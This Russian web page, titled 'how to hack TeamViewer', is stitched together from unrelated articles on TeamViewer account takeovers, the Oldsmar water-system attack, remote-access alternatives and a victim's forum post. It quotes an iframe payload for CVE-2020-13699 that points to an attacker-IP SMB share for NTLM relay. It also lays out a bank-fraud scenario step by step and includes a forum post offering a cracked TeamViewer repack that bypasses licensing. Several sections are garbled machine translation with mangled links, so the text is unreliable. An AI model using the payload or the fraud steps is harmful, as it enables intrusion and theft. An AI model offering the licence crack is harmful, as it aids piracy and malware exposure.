Как взломать teamviewer: TeamViewer всё-таки был взломан в 2016 году / Хабр

Содержание

Хакеры взломали аккаунты пользователей TeamViewer

Информация:

Хакеры взломали аккаунты пользователей TeamViewer

На ресурсе Reddit были опубликованы сведения о том, что группой неизвестных хакеров были взломаны личные данные пользователей программы TeamViewer. Данный софт

позволяет управлять иным устройством на расстоянии. Потому, получая доступ к аккаунту человека, что использует программу, киберпреступники получают практически полный контроль над системой.

Это позволяет злоумышленникам устанавливать вредоносный софт и похищать деньги с банковских аккаунтов. Стало известно, что хакеры теперь способны получить доступ даже к тем учетным записям, что требуют прохождения двухфакторной авторизации и используют белый список. Сотрудники компании, которая производит данный продукт, говорят, что их система взлому не подвергалась, а это значит, что во всем виноваты сами неаккуратные пользователи, которые неосторожно ведут себя со своей персональной информацией и не пользуются необходимыми средствами защиты.

 

TeamViewer отрицает факт взлома и вводит новые меры безопасности

Компания TeamViewer отрицает взлом корпоративной инфраструктуры, а факт недоступности серверов в ночь с 1 на 2 июня объясняет проблемами с DNS и возможной DDoS-атакой. Компания рекомендует пострадавшим не использовать одни и те же пароли на разных сайтах и приложениях, а также включить двухфакторную аутентификацию. К этому можно добавить, что следует обновлять программу до последней версии и периодически менять пароли. Уникальные пароли желательно генерировать, например, с помощью менеджера паролей.

Кроме того, в качестве ответной меры на массовый взлом аккаунтов TeamViewer представила две новых функции безопасности. Первая из них — «Доверенные устройства» (Trusted Devices), которая вводит дополнительную процедуру разрешения на управление аккаунтом с нового устройства (для подтверждения нужно перейти по ссылке, которую присылают по электронной почте). Вторая — «Целостность данных» (Data Integrity), автоматический мониторинг несанкционированного доступа к аккаунту, в том числе с учётом IP-адресов, откуда осуществляется подключение. Если обнаружены признаки взлома, аккаунт подлежит принудительной смене пароля.

Ответ компании TeamViewer кажется логичным и адекватным действием на массовую утечку паролей пользователей (частично, по вине самих пользователей). Тем не менее, всё ещё остаются подозрения, что злоумышленники нашли уязвимость в самом программном обеспечении TeamViewer, что даёт возможность проводить брутфорс паролей и даже обходить двухфакторную аутентификацию. По крайней мере, на форумах есть сообщения от пострадавших, которые заявляют о том, что они использовали двухфакторную аутентификацию.

Среди пострадавших оказались не только простые обыватели, но и специалисты по безопасности. Одним из них стал Ник Брэдли (Nick Bradley), один из ведущих сотрудников отдела по информационной безопасности Threat Research Group компании IBM. Он сообщил о взломе своего аккаунта в пятницу 3 июня. Причём Ник непосредственно наблюдал, как компьютер захватили прямо у него на глазах.

«Примерно в 18:30 вечера я был посередине игры, — говорит Ник. — Внезапно я потерял контроль над мышью и в правом нижнем углу экрана возникло сообщение TeamViewer. Как только я понял, что происходит, то сразу убил приложение. Потом до меня дошло: у меня ведь другие машины с установленным TeamViewer!»

«Я побежал вниз по лестнице, где другой компьютер был включен и работал. Издали я увидел, что там уже появилось окно программы TeamViewer. Прежде чем я успел убрать его, нападавший запустил браузер и открыл новую веб-страницу. Как только я добрался до клавиатуры, я сразу аннулировал удалённый контроль, немедленно зашёл на сайт TeamViewer, изменил пароль и активировал двухфакторную аутентификацию».

Вот и у меня ночью проснулся мой аккаунт. Аккаунт был неактивен с 2013 года. Я им не пользовался совсем с того времени. Пароль на аккаунте был уникальным, не словарным и никогда нигде не использовался более для регистрации. Входили в аккаунт из Киева, дважды 🙂 Так что ребята из TV — миры, двери, мячи!

Рассылка сообщения компании TeamViewer

Уважаемый пользователь TeamViewer,

По нашим данным недавно были совершены попытки войти в Вашу учетную запись TeamViewer с неизвестного устройства или из необычного места. Это могло быть связано с недавними беспрецедентными крупными хищениями данных популярных социальных медиа-платформ и других поставщиков веб-услуг.

Защита данных лежит в основе всего, что мы делаем. Для обеспечения вашей безопасности, мы отметили Вашу учетную запись для вынужденного сброса пароля. Чтобы сбросить пароль, выполните следующие действия:


Перейти к login.teamviewer.com
Выберите «Я забыл свой пароль»
Введите электронную почту учетной записи TeamViewer
После этого вы получите отдельное письмо от нас со ссылкой, для установки нового пароля учетной записи
Нажмите на ссылку и установите новый пароль
Пожалуйста, убедитесь, что Вы установили уникальный пароль, который не используется для любых других услуг.

Мы также рекомендуем использовать двухфакторную аутентификацию, чтобы обеспечить дополнительную защиту для вашей учетной записи TeamViewer. Как это сделать Вы найдете в разделе часто задаваемых вопросов на сайте TeamViewer.

 

В недавнем взломе системы водоснабжения замешан TeamViewer — 1Informer

Если ссылаться на сообщение авторитетного источника в лице издания Associated Press, то появились подробности касательно недавнего взлома системы и попытки отравления водоснабжения города Олдсмар, штат Флорида. Как известно, ранее на этой неделе ПК одного из работников, который был настроен на удалённую работу, был взломан. Но теперь же прояснилось, что это рано или поздно должно было произойти.

Дело в том, что организация использовала устаревшие компьютеры, которые работали на базе далеко не самых новых версий операционной системы Windows 7. Более того, компания для всех ПК и учётных записей для них применяла один общий пароль. В правительственном сообщении, которое было опубликовано вчера, также говорится о том, что в относительно простой атаке применялась специальная программа для получения удалённого доступа к компьютеру. Ею является TeamViewer. И да, если вы знаете что это за программа, то вы уже поняли, что взломать пострадавший ПК было действительно просто, если злоумышленник впоследствии решил применить именно TeamViewer — лицензированное, свободно распространяющееся приложение, которое по своей сути не имеет ничего общего со взломами и хакерами.

Но как бы то ни было официальные лица также заявили, что попытка хакера довести количество химикатов в водоснабжении до опасного уровня была остановлена ​​практически сразу после её начала. Это означает, что злоумышленник либо был не опытен, либо его целью не являлось отравление, ведь если бы он захотел, то смог бы сделать всё куда менее заметно и быстро, с применением специально созданных для этого программных решений. Исследователи безопасности, которые занялись данным вопросом, высказались по этому поводу следующим образом: «Те лица или тот человек, который стоял за данной кибер-атакой, вероятней всего, сумел получить доступ к системе организации, используя слабые места в кибербезопасности, включая плохую защиту паролей и устаревшую операционную систему Windows 7.

Благодаря этому он и получил возможность взломать программное обеспечение, используемое для удаленного управления водоподготовкой. Взломщик, вероятно, также использовал и программу для совместного использования рабочего стола, известную как TeamViewer, чтобы с её помощью получить несанкционированный доступ к системе». Как бы то ни было, данный вопрос ещё не закрыт, и его расследование продолжается до сих пор.

Был взломан TeamViewer? Если вы изменить свой пароль? – Naked Security

Средства удаленного доступа для Windows, очень популярны в эти дни, как с подлинными потребностями пользователей и жуликов.

Удаленный помощник Windows, например, позволяет другим людям , чтобы подключиться к вашему компьютеру и посмотреть , что находится на экране , в то время как вы работаете для того , чтобы помочь вам в этом:

Когда у вас возникли проблемы компьютера, вы можете получить помощь от кого-то другого. Вы можете использовать Удаленный помощник Windows, чтобы пригласить кого-либо подключиться к компьютеру и помочь вам, даже если этот человек не рядом. Убедитесь, что вы только спросите кого-то, что вы доверяете, потому что другой человек будет временно иметь доступ к вашим файлам и персональной информации.

Это как если бы другого человека экран, клавиатура и мышь были подключены через чрезвычайно длинных кабелей, к вашему компьютеру.

На самом деле, они могли бы также сидеть за столом, в офисе, с помощью компьютера напрямую.

Поддельные мошенники технической поддержки – преступники, которые называют вас дома, и лгать вам, что у вас есть вирус, который нуждается в очистке – любовь средств удаленного доступа.

Как ни странно, эти парни обычно не используют их удаленный доступ, чтобы украсть ваши данные или имплантата настоящие вирусы (хотя они могли бы, и иногда может делать), не в последнюю очередь потому, что они знают, что вы смотрите вместе, пока они «поддержки» вас.

Для них, удаленный доступ просто служит, чтобы это выглядело, как будто они на самом деле делают что-то, чтобы оправдать существенную плату они будут взимать плату, когда «проблема» была «исправлена.»

Но если мошенники выяснить ваш пароль и использовать его, пока вы не вокруг, чтобы обнаружить их на него, программное обеспечение для удаленного доступа может быть разного рода золотую жилу.

Они могли бы украсть ваши файлы и продавать данные по метро; набег свой счет PayPal, чтобы купить «подарки»; купить продукты на Amazon; читать вашу электронную почту; разместить свои учетные записи социальных средств массовой информации; кормить ложную информацию для ваших деловых контактов; и многое другое.

Что еще хуже, они не будут нужны никакие Unix-стиле навыки командной строки или взлома опыта: они могли бы сделать все это с помощью клавиатуры и мыши, так же, как они были бы у себя дома.

Шумиха TeamViewer

В последние пару недель, претензии вспыхнули на Reddit о том , что банда жуликов делают именно это.

Эти неизвестные мошенники, по-видимому, делают несанкционированные подключения к пользователям TeamViewer и разрывая их.

(TeamViewer, исходя из Германии, является одним из целого ряда популярных сервисов удаленного доступа на рынке в эти дни.)

На самом деле, эти требования превратились в обвинения, что нарушения лучше всего объясняются хак на самом TeamViewer, которая дала жуликов какую-то заднюю дверь на компьютеры клиентов.

TeamViewer не впечатлен этим объяснением, и реагирует с сильно сформулированное пресс – релиз :

[T] он источник проблемы, согласно нашим исследованиям, является неосторожное обращение, не является потенциальным нарушением безопасности на стороне TeamViewer в.

Главный совет для TeamViewer избежать «неаккуратного использования» своих услуг включает в себя:

  • Используйте разные пароли для каждой учетной записи.
  • Не говорите другим людям ваши пароли.
  • Используйте два фактора аутентификации.
  • Используйте менеджер паролей.

Кто же прав?

Недавно созданный нить на Reddit с титулом TeamViewer Breach Masterthread пытается собрать некоторые доказательства.

Поток призывает пользователей сообщать, если они думают, что они были взломаны в последнее время, и ответить на вопросы в том числе:

  • У вас есть учетная запись TeamViewer?
  • Была включена функция двухфакторной проверки подлинности?
  • Является ли ваш пароль TeamViewer такой же, как и любой другой пароль?

Конечно, тот факт, что кто-то был счет TeamView и взломали ничего не говорит о том, имеет ли учетная запись TeamViewer ничего общего с вторжением …

… Но результаты интересны, тем не менее.

На момент написания [2016-06-03T23: 00Z], ответили чуть менее 80 человек.

Из них, 53 сказали, что они были взломаны.

Но только одна из них была включена функция двухфакторной проверки подлинности, а 37 признали они использовали один и тот же пароль на других счетах.

Насколько мы можем видеть, что доказательства не указывает никаких пальцев на TeamViewer.

Что делать?

Большинство средств удаленного доступа, включая TeamViewer, можно настроить таким образом, что они будут выскочить и попросить вашего разрешения, прежде чем разрешить соединение.

Это простой и эффективный способ предотвращения жуликов от блуждающих в то время как вы не там.

(Нет видео? Не смотреть на YouTube . Нет звука? Нажмите на иконку [CC] для субтитров.)

Узнайте больше о 2FA

(Аудиоплеер выше не работает? Скачать MP3 или слушать на Soundcloud.)

Почему мы блокируем TeamViewer — Сервисы на vc.ru

Объясняем, чем опасны программы удаленного доступа

{«id»:132238,»url»:»https:\/\/vc.ru\/services\/132238-pochemu-my-blokiruem-teamviewer»,»title»:»\u041f\u043e\u0447\u0435\u043c\u0443 \u043c\u044b \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u043c TeamViewer»,»services»:{«facebook»:{«url»:»https:\/\/www.facebook.com\/sharer\/sharer.php?u=https:\/\/vc.ru\/services\/132238-pochemu-my-blokiruem-teamviewer»,»short_name»:»FB»,»title»:»Facebook»,»width»:600,»height»:450},»vkontakte»:{«url»:»https:\/\/vk.com\/share.php?url=https:\/\/vc.ru\/services\/132238-pochemu-my-blokiruem-teamviewer&title=\u041f\u043e\u0447\u0435\u043c\u0443 \u043c\u044b \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u043c TeamViewer»,»short_name»:»VK»,»title»:»\u0412\u041a\u043e\u043d\u0442\u0430\u043a\u0442\u0435″,»width»:600,»height»:450},»twitter»:{«url»:»https:\/\/twitter.com\/intent\/tweet?url=https:\/\/vc.ru\/services\/132238-pochemu-my-blokiruem-teamviewer&text=\u041f\u043e\u0447\u0435\u043c\u0443 \u043c\u044b \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u043c TeamViewer»,»short_name»:»TW»,»title»:»Twitter»,»width»:600,»height»:450},»telegram»:{«url»:»tg:\/\/msg_url?url=https:\/\/vc.ru\/services\/132238-pochemu-my-blokiruem-teamviewer&text=\u041f\u043e\u0447\u0435\u043c\u0443 \u043c\u044b \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u043c TeamViewer»,»short_name»:»TG»,»title»:»Telegram»,»width»:600,»height»:450},»odnoklassniki»:{«url»:»http:\/\/connect.ok.ru\/dk?st.cmd=WidgetSharePreview&service=odnoklassniki&st.shareUrl=https:\/\/vc.ru\/services\/132238-pochemu-my-blokiruem-teamviewer»,»short_name»:»OK»,»title»:»\u041e\u0434\u043d\u043e\u043a\u043b\u0430\u0441\u0441\u043d\u0438\u043a\u0438″,»width»:600,»height»:450},»email»:{«url»:»mailto:?subject=\u041f\u043e\u0447\u0435\u043c\u0443 \u043c\u044b \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u043c TeamViewer&body=https:\/\/vc.ru\/services\/132238-pochemu-my-blokiruem-teamviewer»,»short_name»:»Email»,»title»:»\u041e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u043d\u0430 \u043f\u043e\u0447\u0442\u0443″,»width»:600,»height»:450}},»isFavorited»:false}

37 208 просмотров

Недавно в «Приемной» был опубликован важный пост. Пользователь пожаловался, что в нашем приложении «Телекард» блокируется вход, если на телефоне установлен TeamViewer.

У этого приложения есть две версии: одна называется Remote Control и позволяет управлять компьютерами с телефона, другая — Quick Support, и с ее помощью можно управлять телефоном, просматривая его экран. По умолчанию мы блокируем обе.

Зачем это было сделано?

Мы имеем дело с беспрецедентным ростом телефонного мошенничества за последние полгода. Каждый третий клиент финансовой организации в России сталкивался с мошенниками за этот период. В условиях пандемии люди сильно обеспокоены вопросом сохранности средств, и в момент, когда им звонит «представитель банка», они теряют бдительность.

Мошенники вводят клиента в заблуждение, играя на его эмоциях. Проблема не в том, что они могут получить доступ к вашему телефону или компьютеру. Проблема в том, что мошенники манипулируют человеком и могут украсть деньги его же руками.

Мы не сомневаемся в компетентности многих IT-специалистов, которые являются клиентами нашего банка и используют TeamViewer по рабочей необходимости. Мы решили в таких случаях идти им навстречу, разрешая входить в «Телекард» на свой страх и риск. Однако, для большинства пользователей оставлять такую лазейку было бы непредусмотрительно.

В «Газпромбанке» работают одни из лучших специалистов по информационной безопасности на рынке. Мы очень серьезно относимся к этому вопросу: постоянно информируем клиентов и даже помогаем возвращать средства в случае, если они были украдены. Блокировать возможность пользоваться TeamViewer на фоне буйного раcцвета мошенничества может быть и «негуманно», но когда у тебя почти 1,8 млн пользователей приложения с неясным уровнем подкованности в технических вопросах, нужно ставить хотя бы временные заглушки. Что мы и сделали.

Сценарий атаки

Рассмотрим реальный случай атаки с использованием TeamViewer Remote Control.

  • Мошенник подает за клиента заявку на кредит на сайте Газпромбанка и указывает номер телефона клиента
  • Звонит клиенту, представляется сотрудником банка и сообщает,
    что на него пытаются оформить подозрительный кредит, а также, что его интернет-банк взломан с помощью вирусного ПО, поэтому пароль нужно срочно сбросить.
  • Говорит клиенту, что проведёт действия по отмене
    оформленного кредита и сбросит пароль. Просит установить TeamViewer Quick Support для проведения этих манипуляций через «Телекард»
  • Если выясняется, что у жертвы установлен Remote Control c заранее вписанным id домашнего компьютера, предлагает «удобный» вариант решения проблемы с удалением вредоносного ПО. Нужен только id и пароль от соединения, который обычно у клиента где-нибудь записан.
  • Заходит на компьютер жертвы и устанавливает кейлоггер, после чего говорит что вредоносная программа успешно удалена. Просит клиента зайти через Remote Control на свой компьютер и проверить в личном кабинете сотового оператора, не установлена ли переадресация SMS на другой номер телефона. Затем через клиента инициирует сброс пароля интернет-банка.
  • В этот момент у мошенника появляются все необходимые данные: логин и пароль от личного кабинета мобильного оператора, где он устанавливает переадресацию SMS на подконтрольный ему номер, а также номер карты, CVV, логин и пароль от интернет-банка.
  • Получает кредит наличными на карту клиента и выводит деньги на подконтрольный ему счет.

Это невозможно! Любой человек догадается, что это мошенники.

Увы, нет. Жертвами телефонных мошенников становятся и чиновники, и полицейские, и финансисты. Никакой зависимости от возраста и рода занятий нет: у нас были случаи, когда преступники обманывали молодых людей сильно младше 30, а это категория клиентов, от которой можно ожидать большей бдительности и технической подкованности.

Что делать дальше

Беречь свои деньги и никогда не сообщать звонящим из «службы безопасности» какие-либо данные. Лучше положите трубку и перезвоните в банк.

Мы постоянно совершенствуем свое мобильное приложение с точки зрения безопасности. Впоследствии, как только мы разработаем систему защиты на такие случаи, как вышеприведенный, мы не будем закрывать доступ к нашему приложению из-за TeamViewer и других средств удаленного администрирования. Это неудобство для клиента, и мы это признаем. Однако, вопрос сохранности средств стоит для нас на первом месте.

TeamViewer 13 бесплатная лицензия, навсегда.

Недавно TeamViewer обнаружил коммерческое использование, и отключил мне возможность пользоваться аккаунтом.
Выкладываю вам, проверенный и работоспособный TeamViewer 13, с функцией RESET ID и бесконечной пробной версией.
Без уведомлений, и оповещений при начале и конце сессии, и без рекламы.


Год/Дата Выпуска: 2017
Версия: 13.0. Build 5640
Разработчик: © 2017 TeamViewer. All rights reserved
Сайт разработчика: www.teamviewer.com/ru/download/currentversion.aspx
Разрядность: 32bit, 64bit
Язык интерфейса: Мультиязычный (русский присутствует)
Таблетка: не требуется
Системные требования: Windows XP / Vista / 7 / 8 / 8.1 / 2008 / 2008 R2 / 2012 / 2012 R2 / 10
Описание: RePack бесплатной версии TeamViewer 13 со сбросом ID от vcart и Finder54.

Запуск должен производиться от имени Администратора, иначе не будет работать смена вашего ID.
Смена ID реализована программой TVUnT, которая появляется в трее и выполняется пока запущен TeamViewer, в случае его закрытия и TVUnT закроется.
При повторном открытии, при открытом TeamViewer, сначала закрывается окно TeamViewer, а потом стартует программа, что позволяет не закрывать зависшую программу, а просто включить заново.

TVUnT дополнение к бесплатному TeamViewer 13.0.5640 для снятия каких либо ограничений.
Обеспечивает возможность изменить ваш ID TeamViewer.
Больше нет всплывающих окон в конце сеанса подключения, и у клиента тоже их не будет.
Связь без каких либо ограничений на продолжительность сеанса подключения и их количество одновременно, в том числе и с пользовательскими модулями, разработанными через личный кабинет на сайте TeamViewer.
В основе оставлена легальная бесплатная версия TeamViewer 13.0.5640 без применения каких-либо патчей.

Пароль на архив: bitalk.org

Ссылка для скачивания.

Скрытое содержимое:

**Скрытое содержимое: Для просмотра Вам необходимо минимум 1 сообщений на форуме.**
Осторожно, администрация не несет ответственности за возможные вирусы! В случае обнаружения вируса пишите в теме.

 

Чем заменить TeamViewer? | Компьютерра

Те, кто хотя бы раз пытался удаленно помочь друзьям настроить компьютер или смартфон, наверняка хорошо знают о программе удаленного доступа TeamViewer. Приложение очень удобное: от того, кому надо помочь, не требуется практически никаких специальных знаний: просто по ссылке скачиваешь программу-клиент и сообщаешь свой ID и пароль (которые высвечиваются при запуске программы) другу, который будет настраивать устройство. Но есть у этого продукта один неприятный нюанс — он платный, и при этом довольно дорогой. Правда, разработчики говорят, что для личных целей программу можно использовать бесплатно. Если в личных целях программа используется, 2+ раза в месяц, то могут включаться ограничения: через пять минут работы сеанс связи обрывается на несколько минут. Решить проблему можно, но это определенные танцы с бубном, поэтому мы представим альтернативные решения для удаленной поддержки пользователей.

Так что в нашей подборке мы ограничимся приложениями, которые легко решают одну простую задачу — позволяют удаленно подключиться к другому компьютеру (или смартфону), чтобы оказать помощь. Соответственно, программа должна быть бесплатной (хотя бы для этого действия) плюс установка и настройка приложения со стороны клиента не должна требовать специальных знаний (в идеале — просто скачивание, установка и запуск простого приложения).

Chrome Remote Desktop

Неплохая альтернатива TeamViewer для оказания помощи другим пользователям от известного IT-гиганта. Главный плюс — приложение абсолютно бесплатно. Второй плюс — разобраться с предоставлением доступа к своему компьютеру хоть и сложнее, чем в случае с TeamViewer, но все же не слишком трудно даже для начинающих пользователей ПК. Для этого надо зайти на сайт сервиса, далее скачать специальное расширение и приложение, а потом только можно будет сгенерировать код, благодаря которому продвинутый пользователь получит доступ к компьютеру.

Еще одна замечательная возможность сервиса — управление своим собственным компьютером (или сервером) с другого устройства (даже со смартфона, хотя это неудобно).
Компьютер, который нуждается в настройке, может работать хоть под Windows, хоть под MacOS, хоть под Linux. А вот управлять с компьютера смартфоном не получится. Нет также возможности управлять со смартфона другим смартфоном (обе эти возможности есть у TeamViewer). Так что «Удаленный рабочий стол Chrome» — это не полная замена TeamViewer даже в части удаленной поддержки пользователей.

AnyDesk

Довольно продвинутое приложение, гораздо более полноценный аналог TeamViewer, чем «Удаленный рабочий стол Chrome». Для личного использования сервис бесплатен, но с некоторыми ограничениями.

Для того чтобы оказать помощь другу, необходимо скачать клиент с официального сайта и запустить его (друг должен сделать то же самое), а потом — необходимо ввести адрес компьютера, который нуждается в обслуживании. При этом даже установки приложения не требуется. То есть от неуверенного пользователя требуется только скачивание (это действие можно упростить, отправив прямую ссылку на скачивание или переслав сам клиент, например, через почту), запуск клиента, пересылка адреса своего устройства и при запросе программы — разрешение на управление. В чем-то даже проще, чем у TeamViewer (хотя и у этого сервиса тоже есть портативный клиент).

При необходимости программу можно установить на компьютер (это можно сделать прямо из окна портативной версии).

AnyDesk поддерживает управление устройствами под любыми операционными системами: Windows, Linux, Free BSD, Mac OS, iOS и Android. Причем можно, например, получить доступ как к компьютеру со смартфона, так и к смартфону с компьютера.

Программа дает доступ к файловой системе управляемого устройства, так что при необходимости можно проделать различные манипуляции с файлами, не задействуя экран удаленного устройства.
И тут уместно сказать об ограничениях бесплатной версии. Пользователь бесплатной программы не может удаленно перезагрузить другой компьютер, не имеет доступа к настройкам безопасности, а управление смартфоном с компьютера сводится по сути просто к созерцанию экрана (правда, доступна файловая система смартфона в отдельной вкладке). Запись действий получить при тестировании тоже не удалось. Но в остальном — отличная альтернатива TeamViewer: об ограничениях по времени бесплатных сеансов информации нет, о количестве обслуживаемых компьютеров в месяц — тоже.

«Быстрая помощь» в Windows 10

В Windows 10 есть штатные средства для предоставления удаленного доступа к компьютеру (или для управления удаленным компьютером). Такое средство было во всех системах Windows, начиная с Windows XP (Microsoft Remote Desktop), но оно доступно только в версиях не ниже Pro. А в Windows 10, начиная с версии 1607, появилось специальное приложения, созданное как раз для решения поставленной перед нами задачи.

Для того чтобы начать удаленное управление, на обоих компьютерах необходимо запустить приложение «Быстрая помощь» (Quick Assist), которое можно найти в меню «Пуск», в папке «Стандартные — Windows». Далее управляющий пользователь должен при необходимости войти в аккаунт Microsoft Windows, а потом сообщить пользователю с другой стороны шестизначный код, который тот должен ввести в специальное поле:

После этого на обоих компьютерах необходимо согласиться с разрешением на доступ, и экран управляемого компьютера появится в приложении у «помощника» (так в приложении называется пользователь, осуществляющий управление):

Огромное достоинство способа — от человека, которому надо помочь, не требуется практически никаких знаний, нужно просто найти приложение в меню «Пуск», запустить его, ввести код, дать разрешение и ожидать помощи.

К сожалению, этот простой способ помощи пользователям подойдет не всегда: не у всех, кто нуждается в помощи, стоит Windows 10. Хотя, нужно признать, пользователей этой системы становится все больше и больше, и уж на новых компьютерах данный способ работать будет наверняка.

Кстати, приложение абсолютно бесплатно, вернее, входит в стоимость лицензии Windows 10.

Ammyy Admin, которым лучше не пользоваться

Довольно известная программа, которая позволяет легко подключиться к удаленному компьютеру, и по удобству не уступает TeamViewer. Но, увы, официальный сайт разработчиков программы неоднократно бывал взломан, и хакеры встраивали в установщик, который скачивался с этого сайта, вирусы, с помощью которых позже атаковывали зараженные компьютеры. Так, в 2016 году в установщик дважды встраивались вирусы, которые впоследствии обнаружили специалисты «Лаборатории Касперского». Позже эта проблема (правда, с другого рода вирусом) повторилась в 2018 году. Особенно от последующих атак вирусов страдали корпоративные пользователи, но никто не знает, на что будут нацелены хакеры в будущем. Кстати, Mozilla Firefox и Google Chrome блокируют загрузку установщика с официального сайта, а многие антивирусы сообщают пользователям о потенциальной опасности данного приложения.

Надо отдать должное разработчикам, что после сообщений об заражении установщика, они оперативно устраняли проблему, но все же ситуация, когда вирус был встроен в установщик не менее трех раз, не может не настораживать. Поэтому, используя это приложение для удаленного доступа, вы делаете это на свой страх и риск.

Заключение

Итак, заменить TeamViewer для удаленной помощи пользователям, вполне можно, причем подходящих для нашей цели способов есть несколько. Самый простой — использование «Быстрой помощи» в Windows 10. Если же нужно управлять устройством с другой системой (или управляющее устройство — не под Windows 10), то можно воспользоваться как AnyDesk, так и Chrome Remote Desktop. Оба сервиса поддерживают и управление со смартфона, а AnyDesk позволяет также получить доступ к смартфону, чтобы управлять им.

Уязвимость в TeamViewer можно использовать для взлома пользовательского пароля | CISO club — cybersecurity

Специалисты по информационной безопасности обнаружили в TeamViewer критическую уязвимость, с помощью которой киберпреступники могут взломать в Windows пароль пользователя, что позволит им в дальнейшем эксплуатировать систему.

TeamViewer – приложение, которое применяется для обеспечения удаленного доступа и управления разными типами компьютерных систем, мобильных устройств. Также программа предлагает функционал совместной работы и презентаций. По мере развития пандемии по коронавирусу предприятия из разных стран мира стали активнее использовать TeamViewer для обеспечения эффективной удаленной работы.

Найденная ИБ-экспертами уязвимость CVE2020-13699 является слабым местом в системе безопасности, которое возникает по той причине, что путь или элемент поиска не указываются в кавычках. Отчасти это связано с тем, что программа неверно цитирует пользовательские обработчики URI. Уязвимость может быть использована киберпреступниками, если пользователь с установленной уязвимой версией TeamViewer посещает вредоносные веб-ресурсы.

Джеффри Хофманн, специалист по информационной безопасности компании Praetorian, отметил: «Киберпреступники могут встроить вредоносный iframe на веб-ресурс с созданным URL-адресом (iframe src=’teamviewer10: —play \\attacker-IP\share\fake.tvs’), за счет чего запустится десктопная версия TeamViewer для Windows и отроется удаленный общий ресурс SMB. Затем Windows выполнит идентификацию NTLM при открытии общего ресурса SMB – за счет этого запрос может быть ретранслирован для выполнения кода».

Ранее эксперты по информационной безопасности уже отмечали, что эксплуатация уязвимости может быть проведена удаленно, поэтому не требуется предварительной аутентификации. Специалисты считаются уязвимость CVE-2020-13699 оптимальной для проведения целенаправленных атак.

При этом эксперты из Praetorian говорят о том, что на данный момент нет никаких доказательств, что уязвимость эксплуатируется хакерами – сейчас просто нет общедоступных эксплойтов. При этом CIS оценивает риск эксплуатации этой уязвимости как «высокий» для крупных и средних государственных и коммерческих организаций, домашних пользователей, средних и малых государственных учреждений.

По информации Praetorian, уязвимость актуальна для приложения TeamViewer версий от 8.0 до 15.8.2, поэтому рекомендовано обновление программы как минимум до версии 15.8.3, в которой данная проблема отсутствует.

Взломано через Teamviewer. 1800 € потрачено на Paypal. : teamviewer

Привет,

Я вернулся к своему компьютеру, оставив его, увидел на нем какого-то парня, подключился через Teamviewer, он покупал 350 * 4 долларов каких-то «волшебных бобов» на китайском сайте / игре (я должен признать это меня рассмешило).

Перед покупкой этих «бобов» он также попытался зайти в мою учетную запись Amazon, но был остановлен Rescuetime, затем он попытался зайти на веб-сайт с именем ecard.163.com, но мой DNS фильтровал / блокировал множество «покупок» «веб-сайтов, поэтому это не сработало.

До того, как эти два отказали, он пошел к поставщику «подарочной карты iTunes», магазин немедленно возместил его покупку $ 500 (может быть, потому что я не был его первой целью?)

Ему пришлось повторно подключаться к моему компьютеру несколько раз ( видел это в моем файле журнала Teamviewer), потому что соединение было не таким быстрым. (276 мс, когда я пингуюсь по IP-адресу, который он использовал, я живу во Франции)

О, кстати, он также отправил более 500 долларов на некоторые электронные письма (все принадлежащие некоторым азиатским именам), но я думаю, что он действовал поспешно, может быть потому, что его предыдущие попытки потерпели неудачу.

Я выгнал его со своего компьютера и позвонил в Paypal и, конечно же, сразу же изменил все свои пароли.

Сразу после этого, как я уже сказал, я открыл файл .log TeamViewer и увидел два разных [1] [2] идентификатора teamviewer с двумя разными IP-адресами (один из Китая, другой из Японии, один из Китая принадлежит небольшая компания, китайский VPS-провайдер (http://runidc.com/) [3], из японии кажется, что это бесплатная точка доступа Wi-Fi)

[1] Согласование шифрования сеанса: клиентское приветствие получено от 60–92493

[2] Согласование шифрования сеанса: приветствие клиента получено от 72–26980, длина ключа RSA = 2048

[3] 3752 3960 S0 UDP: получено сообщение a = 103.240.180.230

https://imgpile.com/image/Ir2TE https://imgpile.com/image/IrAlr https://imgpile.com/image/IrLQR

Я добавил их в Teamviewer, они все еще в сети, я попытался отправить им несколько сообщений, но это не работает, в любом случае разрешены только сообщения, приходящие из их «списка компьютеров»: они, вероятно, слишком заняты, ха-ха.

Эта штука меня очень удивила, так как на моем компьютере установлены только Chrome, Teamviewer, RescueTime и ESET, и в основном потому, что я отформатировал свой диск неделю назад.

(Эта ветка ведет меня сюда): https://www.reddit.com/r/hacking/comments/4hh02i/someone_got_into_my_teamviewer_account_and/

Почти то же самое произошло с этими парнями из Reddit, кажется, что все мы используем Teamviewer: https://www.reddit.com/r/hacking/comments/4hh02i/someone_got_into_my_teamviewer_account_and/d2qgffp https://www.reddit.com/r/hacking/comments/4hh02i/someone_gotam_inviewr/d2cd2c/someone_got_inviewr/d2c_someone_got_inviewr/d2c_someone_got_inviewr/d2c_someone_got_inviewr_d2 reddit.com/r/hacking/comments/4hh02i/someone_got_into_my_teamviewer_account_and/d2ts822 https: // www.reddit.com/r/hacking/comments/4hh02i/someone_got_into_my_teamviewer_account_and/d2z4n9v https://www.reddit.com/r/hacking/comments/4hh02i/someone_got_into_my_teamviewer_9count_and_got_into_my_teamviewer_9count_and2.com .php? PHPSESSID = ci5g9pm31nsonasrnh48b7v6t7 & topic = 3483.0

http://teamviewerforums.com/index.php?topic=3483.msg7885#msg7885

http://teamviewerforums.com/index7903.php?

http://teamviewerforums.com/index.php? topic = 3483.msg7933 # msg7933

http://teamviewerforums.com/index.php?PHPSESSID=ci5g9pm31nsonasrnh48b7v6t7&topic=3501.0

http://teamviewerforums.com/index.php?topic=ru#index.php?

http://teamviewerforums.com/index.php?PHPSESSID=ci5g9pm31nsonasrnh48b7v6t7&topic=3500.0

http://teamviewerforums.com/index.php?topic=3485.0

http://teamviewerforums.com/index = 3473.0

http://teamviewerforums.com/index.php?topic=3406.0

И я мог бы процитировать тысячу других людей (и представить себе тех, кто ничего не публиковал в Интернете)

ОБНОВЛЕНИЕ: Нет ответов от службы поддержки Teamviewer (я сделал заявку на французском, они сказали мне, что выиграли не отвечают мне, потому что они отвечают французским клиентам только в том случае, если они используют их платную версию, поэтому я написал это на английском (но у меня все еще нет ответа)

Что я сделал:

Что еще мне делать? Никогда снова использовать Teamviewer?

Взломано !! — Поддержка TeamViewer

